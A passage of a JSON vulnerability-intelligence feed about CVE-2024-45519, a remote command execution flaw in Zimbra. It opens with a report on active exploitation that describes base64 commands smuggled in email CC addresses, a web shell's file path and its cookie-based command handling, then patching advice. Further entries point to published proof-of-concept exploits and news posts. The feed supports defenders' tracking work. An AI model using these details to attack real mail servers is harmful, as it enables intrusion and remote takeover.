causing Zimbra servers to process them and execute them as commands. The addresses contained base64 strings that are executed with the sh utility.\n\nThe company observed emails using multiple CC addresses intended to deploy a web shell on affected Zimbra servers at: \u00ab/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp\u00bb.\n\nThe installed shell then listens for incoming connections with a 
predefined JSESSIONID cookie field and, if it is present, proceeds to parse the JACTION cookie for Base64 commands.\n\nThe web shell supports command execution via exec. Alternatively, it can also download and execute a file over a socket connection.\n\nHarfangLab researcher Ivan Kwiatkowski also warned on Tuesday about the IP from which the malicious emails and 
payloads were being sent as part of mass exploitation of CVE-2024-45519.\n\nProofpoint noted that the attackers used the same server to deliver both the exploit emails and the second-stage payloads, but it has not yet been able to link the observed activity to any known threat actor.\n\nSynacor representatives note that regardless of whether postjournal is enabled, the patch still needs to be applied 
to prevent potential exploitation. \n\nFor Zimbra systems where the feature is not enabled and the fix cannot be applied immediately, removing the postjournal binary can be considered a temporary measure until the fix is applied.", "creation_timestamp": "2024-10-02T12:24:36.000000Z"}, {"uuid": "e6928e07-7d96-4766-912a-48a634030c83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/Root_Exploit/805", "content": "PoC CVE-2024-45519 - Zimbra Postjournal Exploit \ud83d\udd2a\n\nExploit\n\n#Poc #cve #exploit \n\nJoin RootExploit \ud83d\udc8e", "creation_timestamp": "2024-10-07T15:28:05.000000Z"}, {"uuid": "682e2582-ebce-4f23-a589-89e0b428fa91", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/Root_Exploit/795", "content": "exploit + lab setup for CVE-2024-45519 \ud83d\udd25\n\nGithub\n\n#Cve #Exploit\n\nJoin RootExploit \ud83d\udc8e", "creation_timestamp": "2024-10-05T11:18:39.000000Z"}, {"uuid": "f3ccb0c9-668b-41ec-8c3e-f63cba7f5fb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/ctinow/224425", "content": "Critical Zimbra Postjournal flaw CVE-2024-45519 actively exploited in the wild. Patch it now!\nhttps://ift.tt/duWePKx", "creation_timestamp": "2024-10-02T12:09:49.000000Z"}, {"uuid": "2b6e09f2-ae63-44ea-919a-91baf71ee64c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/xakep_ru/16495", "content": "\u0425\u0430\u043a\u0435\u0440\u044b \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Zimbra, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u044f \u043f\u0438\u0441\u044c\u043c\u0430 \u043d\u0430 SMTP-\u0441\u0435\u0440\u0432\u0435\u0440\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0443\u0436\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0443\u044e 
RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Zimbra. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043e\u0441\u043b\u043e\u0436\u043d\u044f\u0435\u0442\u0441\u044f \u0442\u0435\u043c, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u043d\u0430 SMTP-\u0441\u0435\u0440\u0432\u0435\u0440 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u043f\u0438\u0441\u0435\u043c.\n\nhttps://xakep.ru/2024/10/03/zimbra-cve-2024-45519/", "creation_timestamp": "2024-10-03T16:47:57.000000Z"}, {"uuid": "728b7d00-0b2a-41e9-a622-854a5650090f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/9166", "content": "Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution/", "creation_timestamp": "2024-09-29T15:35:51.000000Z"}, {"uuid": "333f3cc2-ff8f-44c1-9438-99e87671058c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11202", "content": "#exploit\n1. CVE-2024-45489:\nArc Browser RCE in JavaScript Boosts\nhttps://kibty.town/blog/arc\n\n2. CVE-2024-44623:\nBlind RCE issue(SPX-GC) in SPX-GC\nhttps://github.com/merbinr/CVE-2024-44623\n\n3. 
CVE-2024-6769:\nPoisoning the activation cache to elevate from medium to high integrity in Windows 10/11/Srv2019/Srv2022\nhttps://github.com/fortra/CVE-2024-6769\n\n4. CVE-2024-45519: \nZimbra SMTP RCE\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution\n]-> https://github.com/p33d/CVE-2024-45519", "creation_timestamp": "2024-11-01T03:20:06.000000Z"}]}